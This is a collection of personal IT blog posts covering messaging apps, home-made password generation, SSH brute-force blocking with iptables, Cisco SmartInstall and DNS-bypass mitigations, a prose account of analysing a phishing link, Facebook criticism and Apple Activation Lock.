Keybase Redux

The current ecosystem out there in the Internet is not one that wants for communication nor security. Not at least in options for either, but rather in the popularity contest between the oldest forms of communication on the Internet versus all these new ways of communicating out there. There are so many ways!

Email and web-based sites like Reddit and Facebook have all proven themselves over and over again, perhaps not quite as secure as any of us would hope, but in uniquity of use. Everyone had to get over the hump of everyone they knew having an email address or a Facebook account. Once the novelty wore off, the security headaches appeared. Most notably how difficult it is to get people to adopt basic security methods when dealing with email, the death and burial of PGP and GPG technologies rendering email plaintext for anyone to snoop on who might have access to do so.

Then the parade of other sorts of solutions exploded. Signal, WhatsApp, Snapchat, Telegram, and Facebook Messenger exploded. People talking to each other, sometimes privately, sometimes not. Facebook ate a little bit of Signal, but so far I haven’t seen anyone actually use it to protect their chats.

Recently I have come across another app like this, called Confide. It brings forward a lot of the features that attract me to things like Signal and Telegram, the end-to-end security between chat partners without worrying about anyone in between eavesdropping. Confide also eliminates a huge privacy hole present in Snapchat, which is Confide appears to have eliminated the possibility of screen shotting the content of the message so it can break out. This obviously has limits, because you can very well take camera-based pictures of the Confide process and eliminate the screen-shot security, but it does push that envelope further out where people have to perform a lot of extra steps to be clever.

Signal was the first app that I saw that introduced exploding messages to this marketplace. Within the Signal app, and Confide as well I presume, you can set a lifetime counter to a message and after the timer has expired, the message is irretreivable.

There were other solutions that came along as well, more colaborative and team-based, like Slack and Discord, services that supplanted text messages like SMS and iMessage for me, especially at work. The further along I went, the more I realized that for a lot of these systems they unfortunately have two big things running against them, they are a change in how people communicate and change is one of the scariest things out there; the second thing is just how oddly resistant people are to actually collaborate. Quite often I am struck by the dial tone I get from folk when I attempt to explain why collaborative solutions like Google Docs and Slack/Discord are so amazing. So I pretty much make an elevator pitch and then let things lie where they land.

Enter Keybase. Originally the site appeared to be a central hub to link personal identity and personal avatars to PGP/GPG keypairs. I suppose you could affectionately regard it as trying to plug in Frankenstein’s Monster just to get a few more twitches out of the poor bastard. However just today, I received an email inviting me to check out Keybase again. They have teams, chat, files, and exploding bits that seem to mingle elements of Signal and Slack together.

What platform wins? Winning is population. When everyone collectively agrees that a solution is so good that it wins by sheer existence alone, that platform wins. Facebook tried it by manipulating human emotions and reward centers, and monetizing all our data that we wanted to share with each other. Right now the platform du jour is Facebook and the corruption of that system is starting to exact a toll on the people who use it. I have abandoned Facebook, and my life has improved. I don’t have the social reward mechanism in place any longer, but it has given me more time to read books and articles online and helped me become a happier person.

What then for these other applications and what they have to bring to the party? I have almost all of them, but use them all very sparingly. What is the point of a communications platform if you don’t know anybody who is using it? It’s the lesson learned by Google Plus in how it attempted to fight with Facebook. If the people aren’t there, then nobody is there. There is a reflection of this all the way back to the start of email as a communications mechanism. PGP/GPG was released back in the late 90’s, and because it didn’t take off, it spiraled out of control and went pear-shaped when it crashed to the surface.

Only time will tell, but from what I’ve seen of Keybase, I’m pleased and intrigued. However again, without anyone to actually use this platform with, it’s just another app that I don’t use on my phone or computer.

Random Passwords: Idle Hands Are The Devils Workshop

I started toying around with the idea of capturing randomness for a source of good n-length random passwords. There are numerous PRNG and TRNG sources out there to make an endless stream of random passwords to use, so this was mostly just an effort in light curiosity.

I thought about a good “fat” source of potentially random data, what did I have on me that could generate a nice big file? My iPhone can do it, specifically the camera. However, I need something random, so I marked up a checkerboard using a piece of paper and cut it into little squares. I put it all in a styrofoam cup and shook the daylights out of it. Dumped the paper from the cup onto my desk and spread out all the paper. Then I took a shot with my iPhone.

This created shot1.jpg. It’s a file with 1,893,984 bytes to it. Since the paper marks will never be in that arrangement ever again, I’d say it’s a pretty good source of randomness.

Next up, I used the shuf command to shuffle the lines of the image together, on a Mac I only had access to GNU’s coreutils via homebrew, so for me it’s:

gshuf shot1.jpg > shot1.rnd.

Then to turn the data into text, I thought about base64 encoding. The command was:

base64 -b 20 shot1.rnd > randpass1.txt

This created a text file with 126,266 lines. Since each line is a password, that’s my next 126,266 passwords. They look something like this:

Gkmd12A/IecVMjSsNnzS
45BrC+HsYh0X7VGzFnXD
gLRhg3NaF5kQAiMZHb1r
0IvqeO63YEyG7U7y0jFl
p+1Bi/Xrnj8PpWlkYX1s

Finally, with the text file handy and in a safe place, I’ll always have a nice random 20-character password handy for quite some time.

So of course, at the end, cleaning up using gshred, but on a journaled file system like HPFS on my Mac, chances are some parts of the data may hang around for a while. However, I was never seriously going into it, so technically a plain delete is good enough, but anyways:

gshred -n 3 -z -u file.ext

 

Automatic Blacklisting using iptables

My home server, an elderly Mac Mini with Debian 8 was recently exposed to the public Internet on port 22, sshd service. I did that on purpose, so I could use the dynamic DNS addressing so I could open a secure shell from wherever I might be, even if that’s not home.

Of course, with a port opened up like this, I have exposed this Mac Mini to the wilds of the public Internet, and it has been scanned thoroughly. When I looked at /var/log/auth.log, it was full of attempts to login using root, admin, and pi. The last one, pi, is hilarious because the hostname was never changed when the OS was migrated from running on my Raspberry Pi, so people who scan the IP and get the hostname think it’s a Raspberry Pi.

This has led to a curious exploration of how to prevent people from scanning and attempting to brute-force my sshd server running on this machine. The passwords are complex, so I’m not really worried about anyone breaking into the box, but I do want to dissuade people from even trying. So after some research, I came up with this iptables definition:

iptables -N LOGDROP
iptables -A LOGDROP -j LOG
iptables -A LOGDROP -j DROP
iptables -A INPUT -m state –state RELATED,ESTABLISHED -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp –dport 22 -i eth0 -m state –state NEW -m recent –set
iptables -A INPUT -p tcp –dport 22 -i eth0 -m state –state NEW -m recent –update –seconds 86400 –hitcount 3 -j LOGDROP

I adapted a bunch of good ideas floating around on other help pages, and these instructions are rather straightforward until the end. I found the LOGDROP chain to be really useful, it will log and then drop traffic in one call, without having to mess around with multiple log and drop jumps. The next keeps any current SSH shell running no matter what, then everything from loopback, and then everything from my internal network. The next sequence sets up a tracking database in the server, if someone attempts to chat up my sshd server more times than three in a day, their IP addresses are installed in a blacklist and their traffic is dropped.

Obviously this is overkill, and my next step is to add 2FA to PAM on this server so that I will need to enter a password and a six digit 2FA code that changes every 30 seconds and never repeats. If anyone else out there is looking for something similar to this, you’re welcome to try it out. Good luck!

Cisco SmartInstall Vulnerability Mitigation

At work, I use Cisco gear everywhere. Recently the SmartInstall Hack has become a security concern. There is a vulnerability in the SmartInstall system that allows bad actors to send arbitrary commands to your network infrastructure.

So I started out knowing how my network is shaped, that I customarily keep the 10-net IP space organized by state, then by city, and then finally by kind of equipment. Out of the four octets, the first one has to be 10, the second one is the state, and the next is the city in that state, and finally, I prefer to keep all my infrastructure gear between 250 and 254.

I started with nmap because I wanted a memory refresher so that I wouldn’t miss a device.

nmap 10.1-10.1-10.250-254

This command provides me a handy report of all the places on the inside of my network where ssh or telnet (depending on the age of the gear) reside. I print off the list, and it becomes an authoritative checklist for all my infrastructure gear.

Then one at a time, either ssh or telnet into the infrastructure devices and issue these commands in one paste command:

conf t
no vstack
end
wr mem

I don’t care if the command fails, it’ll write NVRAM to Flash either way which suits me fine. Once I was sure I got all the equipment that could be affected, I know that at least for this vulnerability, we’re all done. There won’t be anything, at least for this, at work for me to worry over.

Now if you use vstack or SmartInstall, your mileage may vary, but I certainly don’t use it. The default is to leave it on, so the smart money is in forcing it off. Why leave it open as a vulnerability if you don’t have any chance of bad actors on your LAN? Because it is one less thing to worry over.

Starve The Beast

Finally moved all my Facebook Saved Links out to Pocket and dumped them from Facebook. Went from 600 pages liked to 300, although I think there are items on that list that Facebook is no longer revealing, and I suspect it is a bid to prevent people from using automated tapeworms to delete their Facebook account via hollowing. Leave the account in place, but dump all the guts out.

I don’t care to encourage people to do anything. The more I see how much Facebook knows about me, the more shocked I feel. That they have monetized me was always a part of the deal, but the Cambridge Analytica scandal points to a deeper corruption that runs along with the platforms inability to admit error and only responds when caught red-handed. If they have been corrupt all along, how far does the corruption go? How much have they sold us all for profits? Who has the data that describes us so well?

In many ways, #DeleteFacebook is a matter of bonum ira. It’s a good sort of anger that helps clean up a mess that we all have made of things. Facebook demands punishing, in a manner of speaking and retraction of personal data is probably the only rational way to achieve this sort of effort.

I don’t want to delete Facebook as much as starve it of data.

Security Notes: OpenDNS Umbrella

In my workplace, I have deployed OpenDNS Umbrella across my company network to secure and manage my DNS system. I have found that Umbrella is remarkably good at preventing unwanted behavior and protecting my corporate network from threats both outside the firewall and inside it.

All traffic destined for domain resolution must pass to two Hyper-V VM’s located in my Headquarters branch. These two virtual machines handle all requests from my entire network, including the branches across the Data WAN, facilitated by the Meraki Site-to-Site VPN mesh network that the Meraki system handles for me automatically. These two VM’s then pass all their collected queries to OpenDNS itself, where my policies about what kind of Layer 7 categories I have allowed and disallowed for resolution. Malware is the primary reason for Umbrella, as everything from viruses to trojan horses all rely on DNS to function and be clear as a bell so they can function in a harmful manner. Umbrella acts as a canary in a coal mine, messaging the admins about everything from Command-and-Control requests, to Malware requests and category violations throughout the company.

As I have been working with Umbrella, I noticed an immediate vulnerability in the way the system works. There is technically no reason why a user with a company device, or theirs even, could define their DNS servers manually and side-step Umbrella completely. Specifically, I am thinking about Google’s DNS servers at 8.8.8.8 and 8.8.4.4, although any public DNS server would work in this arrangement. It is important to include in this discussion that as an IT administrator I buck the trend against my own industries best practices, that all users are local admins of their machines. I don’t believe in “nailing down the workstations” at all. Instead, I keep my security surface deep into the domain controller and file server, a much tighter arrangement that affords end users more liberty. With the liberty comes a risk that end users could perform some action which would ruin their day. This keeps the users responsible, and it keeps what we have to say in IT more relevant than ever. We don’t keep you from ruining your day, we help you cope. I have found that users, for the most part, treat their computers like simple tools, they don’t go poking about where they shouldn’t, and it has served me very well. Except in situations like this one, where users or malware have the inherent rights to change the DNS resolver settings if they know where to go and how to do it.

So that started me thinking about ways to address this risk and naturally I thought of the switching layer that everyone is connected to. The best place to control this is within the Cisco Catalysts themselves. It’s a matter of an ACL, an Access Control List. I poked about online and eventually came up with this solution. My two DNS resolvers are at 10.1.1.238 and 10.1.1.239 respectively:

ip access-list extended FIXDNS
!
permit udp any host 10.1.1.238 eq domain
permit udp 10.1.1.238 0.0.0.0 any eq domain
permit udp any host 10.1.1.239 eq domain
permit udp 10.1.1.239 0.0.0.0 any eq domain
permit tcp any host 10.1.1.238 eq domain
permit tcp 10.1.1.238 0.0.0.0 any eq domain
permit tcp any host 10.1.1.239 eq domain
permit tcp 10.1.1.239 0.0.0.0 any eq domain
deny tcp any any eq domain log
deny udp any any eq domain log
permit ip any any
!

This code block creates an ACL package named FIXDNS in the switch, and then on individual ports, or VLAN’s, or even the entire switch input flow I can affix this command and put this rule into operation:

ip access-group FIXDNS in

Obviously, I would use this in individual cases across the system, applying the limits only to end-user facing ports and skipping the trunks and support services like servers, copiers, and plotters. Being only a single command, it also makes it a snap to tear it out of ports as well, just on the off chance that I want to relax my security posture for some specific reason. I like the idea of the granularity of control this solution provides me, and I spend every day in my switching systems, so managing this is not any more work for me than usual.

I tested it in the lab as well, which is how this all got started. If the test laptop is configured to fetch its DNS settings from the DHCP pool, the users notice absolutely nothing at all unusual about their connection. Their DNS queries head off to OpenDNS Umbrella for resolution as normal, and everything works as it should. Acceptable traffic is allowed, while malware or banned categories are blocked. In the lab, if I set the laptops NIC to a specific DNS server outside my organization, like Google DNS, then any DNS related queries do not work. As a matter of record, I have included log directives in the block statements above, so if someone is breaking the rules, we’ll see where they are attempting to get their DNS services from and head out to correct it. Although the chances are that they would likely call us to find out why their Internet has stopped working.

I have this FIXDNS package installed on all my switches company-wide, but I haven’t actually enabled it anywhere. I think I am going to roll out the blocks very slowly and make sure that there aren’t any alarms raised at my efforts. Not that I seriously think anyone has the interest or know-how to customize their DNS resolvers, but it is nice to know that they cannot even if they tried.

Crocodile Apologies

The media is starting to process the Cambridge Analytica misuse of Facebook data, and the story is only just getting some legs underneath it now. I see this as a reflective surface of the panic that we all felt back in November 2016, digging all that psychic turbulence back up again.

I want to focus more on Facebook itself. There have been several instances where Facebook has declared innocence publicly up until proof found, usually by journalists or investigators, and then when the truth comes out, Facebook stops, pauses, and issues an apology for their transgressions or mistakes. This reactivity is for me what lies at the core of my misgivings about the Facebook platform, and Facebook as a company.

In my opinion, it appears that Facebook is only chastened and contrite when caught red-handed doing something improper. I cannot trust a platform or a company that behaves this way. I honestly admit that I never really expected Facebook even to want to try to be upright and wholesome, I wanted them to, but all of this is similar to the feeling that I had when Google walked away from its mission statement “Do No Evil.” Facebook cannot be trusted.

There is no shock or surprise that Facebook has no tapeworm function available, only two options exist, leave everything alone or blow it all to kingdom come. I know there is a third path, the manual deletion of everything in the Activity Stream, but over ten years and quite a regular amount of use that is utterly impractical. Plus, I expect Facebook to be both capable and invested in retaining my data even if I think I’ve deleted it. Just because it no longer exists on the interface to me doesn’t mean that it is gone. I doubt thoroughly that even deleted accounts get deleted. I would bet money that they get hidden from view. It would not be in Facebook’s self-interest to lose any data they can get their hands on. I would also not put it past Facebook to also log every keystroke that goes into the text boxes on their site, so even if you don’t post anything, I would bet that Facebook has a record of what you did type and that you abandoned it. That they could record and store your unshared thoughts, indexing, and selling them even if you didn’t share. Logging into the Facebook site itself is a personal hazard to privacy. I have no proof of this last part, but I would fully expect a company like Facebook to do this very thing.

There is little that quitting Facebook will accomplish, since human personalities are quite fixed and constant constructs. We maintain that iron grip of control and Facebook has monetized it, and now, since Cambridge Analytica, they have lost it. Pandoras Box is open.

So why stop using Facebook then? Facebook must be caught being evil, which means that the intent is a stain that runs right to the core. I’ve abandoned Facebook itself because continued use is tacit approval of their offensive behavior, and if it makes them money through advertising revenue, and I’m a part of that? That’s personally unacceptable.

Sample Malware

Today I received a sample email that some of my coworkers caught. They asked me to look into it. The email link led to a bit.ly link, which I was able to extract and through a clever little trick, appending the bit.ly link with a + character doesn’t load the site that the bit.ly link goes to but tells you about the link. This link has been clicked on about 7000 times. Already I know we’re dealing with malware, so now it’s not a question of if it’s a rabbit hole, but rather, how deep does it go?

I pulled the bit.ly link contents out and handed it to curl on the terminal in my Macbook Pro. I don’t expect curl to do anything but show me the text of where this bit.ly link goes. It heads to a PHP file on a presumably hacked web-server or blog. The PHP itself is a HTTP refresh-redirect to a Dropbox hosted file. So I opened up my Virus Lab VM and followed where this led. The Dropbox content said it was a 1MB PDF file, but when I opened that, it led to a phishing attempt.

The phishing hack had an obnoxious URL attached to it, so I pulled that out and discovered it was encoded in base64 format. I decoded that text chunk online, and it revealed a Javascript script-block formed by a single call to document.write(unescape()) function.

Whoever it was, went to a long length to obfuscate their malware. Ultimately it led nowhere because we caught it. I find this sort of thing fascinating to pull apart, like an easy little puzzle to unravel. The phishing attempt is for email username and password, and if someone falls for that, then thanks to people being usually lazy with passwords, once you have one password, chances are you have all of them on every other site.

Just another reason to use a password manager and have individual passwords per individual sites. If one breaches, then the damage is limited to that one site, not all of them.

Apple’s Activation Lock

open-159121_640I just spent the last hour bashing my head against Apple’s Activation Lock on a coworkers iPad 2. They brought it to me because it had nearly every assistive mode option turned on, and it was locked with an unknown iCloud account. I tried to get around the lock to no avail, even to return the device to factory specifications. Even the factory reset ends up crashing into the Activation Lock.

It’s heartening to know that Activation Lock took the guts out of the stolen devices market for Apple mobile devices, but in this particular case it’s creating a huge headache. There is no way for me to move forward with treating this issue because the iPad only refers to its owner by a guesstimate email address, b******@gmail.com. I don’t know what this is, and there is no way for me to figure it out. So this device is pretty much bricked, and I have no choice but to send the user directly to an Apple store with the instructions to throw the device on their mercy.

If you are going to give away or sell your Apple device, make sure you TURN OFF ACTIVATION LOCK. There is no way, not even DFU-mode or Factory Reset that can defeat the lock. There are some hacks that used to work, but Apple catches on quickly and updates their iOS to close each possible hack soon after it appears.

I don’t pitch a fight with Apple over this, it was a clear and present requirement that they met, it just makes dealing with this particular issue impossible for people like me to resolve. The best way around this issue is to secure each and every device with an iCloud account and write the iCloud username and password down in a very legible and memorable safe place! Without the iCloud account details or a trip to the Apple Store, the device is so much plastic, metal, and glass.